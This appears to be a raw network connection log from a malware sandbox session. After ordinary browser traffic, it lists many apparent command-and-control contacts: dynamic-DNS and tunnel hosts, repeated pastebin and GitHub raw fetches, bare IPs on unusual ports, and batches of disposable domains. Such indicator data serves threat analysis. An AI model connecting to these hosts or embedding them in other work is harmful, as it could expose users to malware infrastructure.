US 34.149.128.2:443 support.mozilla.org tcp
US 8.8.8.8:53 us-west1.prod.sumo.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 prod.content-signature-chains.prod.webservices.mozgcp.net udp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
US 172.169.87.222:443 msedge.api.cdp.microsoft.com tcp
US 8.8.8.8:53 prod.ads.prod.webservices.mozgcp.net udp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
IE 52.142.124.215:443 duckduckgo.com tcp
IE 52.142.124.215:443 duckduckgo.com tcp
IE 52.142.124.215:443 duckduckgo.com tcp
IE 20.223.54.233:443 links.duckduckgo.com tcp
IE 20.223.54.233:443 links.duckduckgo.com tcp
GB 104.91.71.146:80 msedge.b.tlu.dl.delivery.mp.microsoft.com tcp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
IE 52.142.125.222:443 external-content.duckduckgo.com tcp
IE 52.142.125.222:443 external-content.duckduckgo.com tcp
IE 52.142.125.222:443 external-content.duckduckgo.com tcp
IE 52.142.125.222:443 external-content.duckduckgo.com tcp
IE 52.142.125.222:443 external-content.duckduckgo.com tcp
IE 52.142.125.222:443 external-content.duckduckgo.com tcp
US 8.8.8.8:53 learn.microsoft.com udp
US 8.8.8.8:53 improving.duckduckgo.com udp
IE 52.142.124.215:443 improving.duckduckgo.com tcp
IE 52.142.124.215:443 improving.duckduckgo.com tcp
IE 52.142.124.215:443 improving.duckduckgo.com tcp
IE 52.142.124.215:443 improving.duckduckgo.com tcp
IE 52.142.124.215:443 improving.duckduckgo.com tcp
IE 52.142.124.215:443 improving.duckduckgo.com tcp
IE 52.142.124.215:443 improving.duckduckgo.com tcp
IE 52.142.124.215:443 improving.duckduckgo.com tcp
IE 52.142.124.215:443 improving.duckduckgo.com tcp
IE 52.142.124.215:443 improving.duckduckgo.com tcp
IE 52.142.124.215:443 improving.duckduckgo.com tcp
IE 52.142.124.215:443 improving.duckduckgo.com tcp
US 8.8.8.8:53 external-content.duckduckgo.com udp
GB 23.37.198.97:443 learn.microsoft.com tcp
US 8.8.8.8:53 e13636.dscb.akamaiedge.net udp
US 8.8.8.8:53 js.monitor.azure.com udp
US 13.107.246.65:443 js.monitor.azure.com tcp
US 13.107.246.65:443 js.monitor.azure.com tcp
US 13.107.246.65:443 js.monitor.azure.com tcp
US 13.107.246.65:443 js.monitor.azure.com tcp
US 8.8.8.8:53 s-part-0037.t-0009.t-msedge.net udp
US 8.8.8.8:53 location.services.mozilla.com udp
US 35.190.72.216:443 prod.classify-client.prod.webservices.mozgcp.net udp
GB 172.217.169.78:443 redirector.gvt1.com tcp
GB 172.217.169.78:443 redirector.gvt1.com udp
GB 74.125.105.7:443 r2.sn-aigl6ns6.gvt1.com tcp
GB 74.125.105.7:443 r2.sn-aigl6ns6.gvt1.com udp
NL 2.18.121.73:80 ciscobinary.openh264.org tcp
US 52.182.143.210:443 onedscolprdcus10.centralus.cloudapp.azure.com tcp
US 52.182.143.210:443 onedscolprdcus10.centralus.cloudapp.azure.com tcp
US 8.8.8.8:53 browser.events.data.microsoft.com udp
US 8.8.8.8:53 onedscolprdcus10.centralus.cloudapp.azure.com udp
US 8.8.8.8:53 onedscolprdwus10.westus.cloudapp.azure.com udp
US 13.107.246.65:443 download.sysinternals.com tcp
US 13.107.246.65:443 download.sysinternals.com tcp
US 8.8.8.8:53 onedscolprdwus10.westus.cloudapp.azure.com udp
US 8.8.8.8:53 browser.events.data.microsoft.com udp
US 8.8.8.8:53 onedscolprdgwc02.germanywestcentral.cloudapp.azure.com udp
IE 52.142.124.215:443 improving.duckduckgo.com tcp
IE 52.142.124.215:443 improving.duckduckgo.com tcp
IE 52.142.125.222:443 external-content.duckduckgo.com tcp
US 8.8.8.8:53 duckduckgo.com udp
US 8.8.8.8:53 links.duckduckgo.com udp
IE 20.223.54.233:443 links.duckduckgo.com tcp
US 8.8.8.8:53 external-content.duckduckgo.com udp
US 8.8.8.8:53 onedscolprdwus11.westus.cloudapp.azure.com udp
US 8.8.8.8:53 prod.remote-settings.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 prod.remote-settings.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 browser.events.data.microsoft.com udp
US 20.189.173.10:443 onedscolprdwus09.westus.cloudapp.azure.com tcp
US 8.8.8.8:53 browser.events.data.microsoft.com udp
US 8.8.8.8:53 onedscolprdwus09.westus.cloudapp.azure.com udp
US 8.8.8.8:53 onedscolprdwus09.westus.cloudapp.azure.com udp
US 8.8.8.8:53 browser.events.data.microsoft.com udp
US 8.8.8.8:53 browser.events.data.microsoft.com udp
US 8.8.8.8:53 onedscolprdweu12.westeurope.cloudapp.azure.com udp
US 8.8.8.8:53 onedscolprdweu12.westeurope.cloudapp.azure.com udp
US 8.8.8.8:53 browser.events.data.microsoft.com udp
US 8.8.8.8:53 onedscolprdwus12.westus.cloudapp.azure.com udp
US 8.8.8.8:53 browser.events.data.microsoft.com udp
US 8.8.8.8:53 onedscolprdwus12.westus.cloudapp.azure.com udp
US 8.8.8.8:53 e13636.dscb.akamaiedge.net udp
GB 23.37.198.97:443 e13636.dscb.akamaiedge.net tcp
US 8.8.8.8:53 learn.microsoft.com udp
US 8.8.8.8:53 e13636.dscb.akamaiedge.net udp
US 8.8.8.8:53 wcpstatic.microsoft.com udp
US 8.8.8.8:53 js.monitor.azure.com udp
US 8.8.8.8:53 s-part-0037.t-0009.t-msedge.net udp
US 13.107.246.65:443 s-part-0037.t-0009.t-msedge.net tcp
US 13.107.246.65:443 s-part-0037.t-0009.t-msedge.net tcp
US 8.8.8.8:53 onedscolprdwus12.westus.cloudapp.azure.com udp
US 8.8.8.8:53 download.sysinternals.com udp
US 13.107.246.65:443 download.sysinternals.com tcp
GB 104.91.71.146:80 msedge.b.tlu.dl.delivery.mp.microsoft.com tcp
US 8.8.8.8:53 msedge.b.tlu.dl.delivery.mp.microsoft.com udp
US 8.8.8.8:53 msedge.b.tlu.dl.delivery.mp.microsoft.com udp
US 199.232.214.172:80 msedge.b.tlu.dl.delivery.mp.microsoft.com tcp
US 8.8.8.8:53 onedscolprdwus10.westus.cloudapp.azure.com udp
US 8.8.8.8:53 urlhaus.abuse.ch udp
US 151.101.194.49:443 urlhaus.abuse.ch tcp
CN 8.141.166.236:10020 tcp
US 151.101.194.49:443 urlhaus.abuse.ch tcp
VN 103.167.89.125:80 tcp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.111.133:443 raw.githubusercontent.com tcp
RU 185.215.113.209:80 tcp
US 185.199.111.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 late-lil.at.ply.gg udp
US 147.185.221.229:35022 late-lil.at.ply.gg tcp
US 8.8.8.8:53 github.com udp
US 185.199.108.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 ip-api.com udp
US 8.8.8.8:53 late-lil.at.ply.gg udp
US 8.8.8.8:53 pb.agnt.ru udp
RU 45.90.34.133:80 pb.agnt.ru tcp
US 147.185.221.229:35022 late-lil.at.ply.gg tcp
US 185.199.110.133:443 raw.githubusercontent.com tcp
N/A 127.0.0.1:1504 tcp
US 8.8.8.8:53 github.com udp
RU 185.215.113.209:80 185.215.113.209 tcp
US 172.67.19.24:443 pastebin.com tcp
US 8.8.8.8:53 microsoftsys.ddns.net udp
GB 20.26.156.215:443 github.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
N/A 127.0.0.1:1504 tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 147.185.221.229:35022 late-lil.at.ply.gg tcp
GB 20.26.156.215:443 github.com tcp
N/A 127.0.0.1:1504 tcp
US 8.8.8.8:53 microsoftsys.ddns.net udp
GB 20.26.156.215:443 github.com tcp
GB 20.26.156.215:80 github.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 73.62.14.5:4782 tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
TR 94.156.177.33:80 tcp
NL 89.110.69.103:80 89.110.69.103 tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
RU 185.215.113.209:80 185.215.113.209 tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 8.8.8.8:53 havocc.ddns.net udp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
N/A 127.0.0.1:1504 tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 8.8.8.8:53 microsoftsys.ddns.net udp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
GB 20.26.156.215:80 github.com tcp
GB 20.26.156.215:443 github.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
N/A 127.0.0.1:1504 tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 147.185.221.17:39017 profile-indians.gl.at.ply.gg tcp
US 8.8.8.8:53 havocc.ddns.net udp
US 147.185.221.229:35022 late-lil.at.ply.gg tcp
US 8.8.8.8:53 microsoftsys.ddns.net udp
N/A 127.0.0.1:1504 tcp
TR 94.156.177.33:80 tcp
US 73.62.14.5:4782 tcp
US 8.8.8.8:53 havocc.ddns.net udp
GB 104.91.71.146:80 msedge.b.tlu.dl.delivery.mp.microsoft.com tcp
US 8.8.8.8:53 msedge.b.tlu.dl.delivery.mp.microsoft.com udp
US 8.8.8.8:53 downsexv.com udp
N/A 127.0.0.1:1504 tcp
US 8.8.8.8:53 microsoftsys.ddns.net udp
GB 20.26.156.215:80 github.com tcp
US 104.21.32.1:80 downsexv.com tcp
KR 152.67.212.187:443 tcp
US 8.8.8.8:53 rappel-coinbase.com udp
RU 91.202.233.151:80 rappel-coinbase.com tcp
HK 47.240.68.28:81 coach.028csc.com tcp
US 8.8.8.8:53 clammypunero.com udp
US 8.8.8.8:53 toppyneedus.biz udp
US 8.8.8.8:53 skirtgrippys.com udp
US 8.8.8.8:53 plasticreie.com udp
US 8.8.8.8:53 cabbagepattof.net udp
US 8.8.8.8:53 believezioep.com udp
US 8.8.8.8:53 garderjjerop.com udp
US 104.20.3.235:443 pastebin.com tcp
US 104.20.3.235:443 pastebin.com tcp
US 104.20.3.235:443 pastebin.com tcp
VN 14.243.221.170:3322 tcp
US 104.20.3.235:443 pastebin.com tcp
US 104.20.3.235:443 pastebin.com tcp
US 104.20.3.235:443 pastebin.com tcp
US 8.8.8.8:53 havocc.ddns.net udp
US 104.20.3.235:443 pastebin.com tcp
US 8.8.8.8:53 steamcommunity.com udp
GB 23.214.143.155:443 steamcommunity.com tcp
GB 23.214.143.155:443 steamcommunity.com tcp
US 8.8.8.8:53 hopeefreamed.com udp
US 104.21.61.41:443 hopeefreamed.com tcp
US 104.21.61.41:443 hopeefreamed.com tcp
US 104.20.3.235:443 pastebin.com tcp
US 104.20.3.235:443 pastebin.com tcp
US 104.20.3.235:443 pastebin.com tcp
US 104.20.3.235:443 pastebin.com tcp
US 147.185.221.17:39017 profile-indians.gl.at.ply.gg tcp
US 104.20.3.235:443 pastebin.com tcp
US 8.8.8.8:53 microsoftsys.ddns.net udp
US 104.21.61.41:443 hopeefreamed.com tcp
US 104.20.3.235:443 pastebin.com tcp
US 147.185.221.229:35022 late-lil.at.ply.gg tcp
US 104.21.61.41:443 hopeefreamed.com tcp
N/A 127.0.0.1:1504 tcp
KR 152.67.212.187:443 tcp
US 104.20.3.235:443 pastebin.com tcp
US 104.21.61.41:443 hopeefreamed.com tcp
US 104.21.61.41:443 hopeefreamed.com tcp
US 104.21.61.41:443 hopeefreamed.com tcp
US 104.21.61.41:443 hopeefreamed.com tcp
US 104.20.3.235:443 pastebin.com tcp
N/A 127.0.0.1:1504 tcp
US 104.20.3.235:443 pastebin.com tcp
US 104.20.3.235:443 pastebin.com tcp
US 104.21.61.41:443 hopeefreamed.com tcp
US 73.62.14.5:4782 tcp
US 104.21.61.41:443 hopeefreamed.com tcp
US 104.20.3.235:443 pastebin.com tcp
US 104.20.3.235:443 pastebin.com tcp
US 104.20.3.235:443 pastebin.com tcp
US 104.20.3.235:443 pastebin.com tcp
US 104.20.3.235:443 pastebin.com tcp
US 104.20.3.235:443 pastebin.com tcp
US 104.20.3.235:443 pastebin.com tcp
US 104.20.3.235:443 pastebin.com tcp
US 104.20.3.235:443 pastebin.com tcp
N/A 127.0.0.1:1504 tcp
US 104.21.61.41:443 hopeefreamed.com tcp
US 104.20.3.235:443 pastebin.com tcp
US 104.20.3.235:443 pastebin.com tcp
US 104.20.3.235:443 pastebin.com tcp
US 104.20.3.235:443 pastebin.com tcp
US 104.20.3.235:443 pastebin.com tcp
US 104.20.3.235:443 pastebin.com tcp
US 104.20.3.235:443 pastebin.com tcp
US 104.20.3.235:443 pastebin.com tcp
US 104.20.3.235:443 pastebin.com tcp
US 104.20.3.235:443 pastebin.com tcp
US 104.21.61.41:443 hopeefreamed.com tcp
US 104.20.3.235:443 pastebin.com tcp
US 104.20.3.235:443 pastebin.com tcp
US 104.20.3.235:443 pastebin.com tcp
US 104.20.3.235:443 pastebin.com tcp
US 104.20.3.235:443 pastebin.com tcp
US 104.20.3.235:443 pastebin.com tcp
US 104.20.3.235:443 pastebin.com tcp
US 104.20.3.235:443 pastebin.com tcp
US 104.20.3.235:443 pastebin.com tcp
US 104.20.3.235:443 pastebin.com tcp
US 104.20.3.235:443 pastebin.com tcp
US 104.20.3.235:443 pastebin.com tcp
US 104.20.3.235:443 pastebin.com tcp
US 104.20.3.235:443 pastebin.com tcp
US 104.20.3.235:443 pastebin.com tcp
US 104.20.3.235:443 pastebin.com tcp
US 104.20.3.235:443 pastebin.com tcp
US 104.20.3.235:443 pastebin.com tcp
US 104.20.3.235:443 pastebin.com tcp
US 104.20.3.235:443 pastebin.com tcp
US 104.20.3.235:443 pastebin.com tcp
US 104.20.3.235:443 pastebin.com tcp
US 104.20.3.235:443 pastebin.com tcp
US 104.20.3.235:443 pastebin.com tcp
US 104.20.3.235:443 pastebin.com tcp
US 104.20.3.235:443 pastebin.com tcp
US 104.20.3.235:443 pastebin.com tcp
US 104.20.3.235:443 pastebin.com tcp
US 104.20.3.235:443 pastebin.com tcp
US 104.20.3.235:443 pastebin.com tcp
US 104.20.3.235:443 pastebin.com tcp
US 104.20.3.235:443 pastebin.com tcp
US 104.20.3.235:443 pastebin.com tcp
US 104.20.3.235:443 pastebin.com tcp
US 104.20.3.235:443 pastebin.com tcp
US 104.20.3.235:443 pastebin.com tcp
US 104.20.3.235:443 pastebin.com tcp
US 104.20.3.235:443 pastebin.com tcp
US 104.20.3.235:443 pastebin.com tcp
US 104.20.3.235:443 pastebin.com tcp
US 104.20.3.235:443 pastebin.com tcp
US 104.20.3.235:443 pastebin.com tcp
N/A 127.0.0.1:1504 tcp
US 8.8.8.8:53 microsoftsys.ddns.net udp
US 104.20.3.235:443 pastebin.com tcp
VN 14.243.221.170:3322 tcp
US 104.20.3.235:443 pastebin.com tcp
US 147.185.221.229:35022 late-lil.at.ply.gg tcp
US 104.20.3.235:443 pastebin.com tcp
US 104.20.3.235:443 pastebin.com tcp
US 104.20.3.235:443 pastebin.com tcp
US 104.20.3.235:443 pastebin.com tcp
US 104.20.3.235:443 pastebin.com tcp
US 104.20.3.235:443 pastebin.com tcp
US 104.20.3.235:443 pastebin.com tcp
N/A 127.0.0.1:1504 tcp
US 104.20.3.235:443 pastebin.com tcp
US 104.20.3.235:443 pastebin.com tcp
US 104.20.3.235:443 pastebin.com tcp
US 104.20.3.235:443 pastebin.com tcp
US 147.185.221.17:39017 profile-indians.gl.at.ply.gg tcp
US 104.20.3.235:443 pastebin.com tcp
US 104.20.3.235:443 pastebin.com tcp
US 104.20.3.235:443 pastebin.com tcp
US 104.20.3.235:443 pastebin.com tcp
US 104.20.3.235:443 pastebin.com tcp
US 104.20.3.235:443 pastebin.com tcp
US 104.20.3.235:443 pastebin.com tcp
US 8.8.8.8:53 b46.oss-cn-hongkong.aliyuncs.com udp
US 104.20.3.235:443 pastebin.com tcp
HK 47.79.64.225:443 b46.oss-cn-hongkong.aliyuncs.com tcp
US 104.20.3.235:443 pastebin.com tcp
US 104.20.3.235:443 pastebin.com tcp
US 104.20.3.235:443 pastebin.com tcp
US 104.20.3.235:443 pastebin.com tcp
US 104.20.3.235:443 pastebin.com tcp
US 104.20.3.235:443 pastebin.com tcp
US 104.20.3.235:443 pastebin.com tcp
US 104.20.3.235:443 pastebin.com tcp
US 104.20.3.235:443 pastebin.com tcp
US 104.20.3.235:443 pastebin.com tcp
US 104.20.3.235:443 pastebin.com tcp
US 104.20.3.235:443 pastebin.com tcp
US 104.20.3.235:443 pastebin.com tcp
US 104.20.3.235:443 pastebin.com tcp
US 104.20.3.235:443 pastebin.com tcp
US 104.20.3.235:443 pastebin.com tcp
US 104.20.3.235:443 pastebin.com tcp
US 104.20.3.235:443 pastebin.com tcp
US 8.8.8.8:53 microsoftsys.ddns.net udp
US 104.20.3.235:443 pastebin.com tcp
US 104.20.3.235:443 pastebin.com tcp
US 104.20.3.235:443 pastebin.com tcp
US 104.20.3.235:443 pastebin.com tcp
US 104.20.3.235:443 pastebin.com tcp
US 73.62.14.5:4782 tcp
US 104.20.3.235:443 pastebin.com tcp
US 104.20.3.235:443 pastebin.com tcp
N/A 127.0.0.1:1504 tcp
US 104.20.3.235:443 pastebin.com tcp
US 104.20.3.235:443 pastebin.com tcp
US 104.20.3.235:443 pastebin.com tcp
US 104.20.3.235:443 pastebin.com tcp
US 104.20.3.235:443 pastebin.com tcp
US 104.20.3.235:443 pastebin.com tcp
US 104.20.3.235:443 pastebin.com tcp
RU 185.81.68.156:80 185.81.68.156 tcp
US 104.20.3.235:443 pastebin.com tcp
US 104.20.3.235:443 pastebin.com tcp
US 104.20.3.235:443 pastebin.com tcp
US 104.20.3.235:443 pastebin.com tcp
RU 185.215.113.75:80 185.215.113.75 tcp
US 104.20.3.235:443 pastebin.com tcp
HK 117.18.7.76:3782 tcp
US 104.20.3.235:443 pastebin.com tcp
RU 185.81.68.156:80 185.81.68.156 tcp
US 104.20.3.235:443 pastebin.com tcp
US 104.20.3.235:443 pastebin.com tcp
US 104.20.3.235:443 pastebin.com tcp
US 104.20.3.235:443 pastebin.com tcp
US 104.20.3.235:443 pastebin.com tcp
US 104.20.3.235:443 pastebin.com tcp
US 104.20.3.235:443 pastebin.com tcp
US 104.20.3.235:443 pastebin.com tcp
US 104.20.3.235:443 pastebin.com tcp
US 104.20.3.235:443 pastebin.com tcp
US 104.20.3.235:443 pastebin.com tcp
US 104.20.3.235:443 pastebin.com tcp
US 104.20.3.235:443 pastebin.com tcp
US 104.20.3.235:443 pastebin.com tcp
US 104.20.3.235:443 pastebin.com tcp
US 104.20.3.235:443 pastebin.com tcp
US 104.20.3.235:443 pastebin.com tcp
US 8.8.8.8:53 microsoftsys.ddns.net udp
US 104.20.3.235:443 pastebin.com tcp
US 104.20.3.235:443 pastebin.com tcp
US 104.20.3.235:443 pastebin.com tcp
US 104.20.3.235:443 pastebin.com tcp
US 104.20.3.235:443 pastebin.com tcp
N/A 127.0.0.1:1504 tcp
US 147.185.221.229:35022 late-lil.at.ply.gg tcp
VN 14.243.221.170:3322 tcp
US 147.185.221.17:39017 profile-indians.gl.at.ply.gg tcp
US 8.8.8.8:53 microsoftsys.ddns.net udp
N/A 127.0.0.1:1504 tcp
US 73.62.14.5:4782 tcp
HK 117.18.7.76:3782 tcp
US 8.8.8.8:53 microsoftsys.ddns.net udp
US 147.185.221.229:35022 late-lil.at.ply.gg tcp
N/A 127.0.0.1:1504 tcp
RU 185.81.68.156:80 185.81.68.156 tcp
VN 14.243.221.170:3322 tcp
N/A 127.0.0.1:1504 tcp
US 147.185.221.17:39017 profile-indians.gl.at.ply.gg tcp
KR 152.67.212.187:443 tcp
N/A 127.0.0.1:1504 tcp
US 73.62.14.5:4782 tcp
N/A 127.0.0.1:1504 tcp
US 8.8.8.8:53 microsoftsys.ddns.net udp
HK 117.18.7.76:3782 tcp
US 147.185.221.229:35022 late-lil.at.ply.gg tcp
N/A 127.0.0.1:1504 tcp
US 8.8.8.8:53 microsoftsys.ddns.net udp
VN 14.243.221.170:3322 tcp
N/A 127.0.0.1:1504 tcp
US 147.185.221.17:39017 profile-indians.gl.at.ply.gg tcp
US 8.8.8.8:53 microsoftsys.ddns.net udp
US 73.62.14.5:4782 tcp
KR 146.56.118.137:80 146.56.118.137 tcp
N/A 127.0.0.1:1504 tcp
HK 117.18.7.76:3782 tcp
US 147.185.221.229:35022 late-lil.at.ply.gg tcp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:80 github.com tcp
GB 20.26.156.215:443 github.com tcp
N/A 127.0.0.1:1504 tcp
VN 14.243.221.170:3322 tcp
N/A 127.0.0.1:1504 tcp
US 8.8.8.8:53 microsoftsys.ddns.net udp
US 147.185.221.17:39017 profile-indians.gl.at.ply.gg tcp
DE 3.70.228.168:555 tcp
US 73.62.14.5:4782 tcp
KR 152.67.212.187:443 tcp
RU 185.215.113.209:80 185.215.113.209 tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
HK 117.18.7.76:3782 tcp
US 147.185.221.229:35022 late-lil.at.ply.gg tcp
RU 185.215.113.16:80 185.215.113.16 tcp
DE 209.38.221.184:8080 tcp
US 8.8.8.8:53 microsoftsys.ddns.net udp
DE 46.235.26.83:8080 tcp
US 8.8.8.8:53 GDinpHlLXN.GDinpHlLXN udp
NL 89.110.69.103:80 89.110.69.103 tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
HK 156.245.12.92:8000 156.245.12.92 tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
VN 14.243.221.170:3322 tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
HK 156.245.12.57:8000 tcp
US 147.185.221.17:39017 profile-indians.gl.at.ply.gg tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
DE 185.218.125.157:21441 tcp
US 8.8.8.8:53 microsoftsys.ddns.net udp
DE 3.70.228.168:555 tcp
US 8.8.8.8:53 fivexx5ht.top udp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 73.62.14.5:4782 tcp
N/A 127.0.0.1:1504 tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 8.8.8.8:53 berrylinyj.cyou udp
US 8.8.8.8:53 worddosofrm.shop udp
US 172.67.19.24:443 pastebin.com tcp
US 8.8.8.8:53 mutterissuen.shop udp
US 8.8.8.8:53 standartedby.shop udp
US 8.8.8.8:53 nightybinybz.shop udp
US 172.67.19.24:443 pastebin.com tcp
US 8.8.8.8:53 conceszustyb.shop udp
US 8.8.8.8:53 bakedstusteeb.shop udp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 147.185.221.229:35022 late-lil.at.ply.gg tcp
HK 117.18.7.76:3782 tcp
US 8.8.8.8:53 fivexx5ht.top udp
US 8.8.8.8:53 moutheventushz.shop udp
US 8.8.8.8:53 steamcommunity.com udp
GB 23.214.143.155:443 steamcommunity.com tcp
DE 147.28.185.29:80 tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
N/A 224.0.0.251:5353 udp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 8.8.8.8:53 microsoftsys.ddns.net udp
US 8.8.8.8:53 fivexx5ht.top udp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
DE 185.218.125.157:21441 tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
NL 206.166.251.4:8080 tcp
US 172.67.19.24:443 pastebin.com tcp
US 8.8.8.8:53 fivexx5ht.top udp
VN 14.243.221.170:3322 tcp
DE 3.70.228.168:555 tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 73.62.14.5:4782 tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 8.8.8.8:53 fivexx5ht.top udp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 147.185.221.17:39017 profile-indians.gl.at.ply.gg tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
KR 152.67.212.187:443 tcp
US 147.185.221.229:35022 late-lil.at.ply.gg tcp
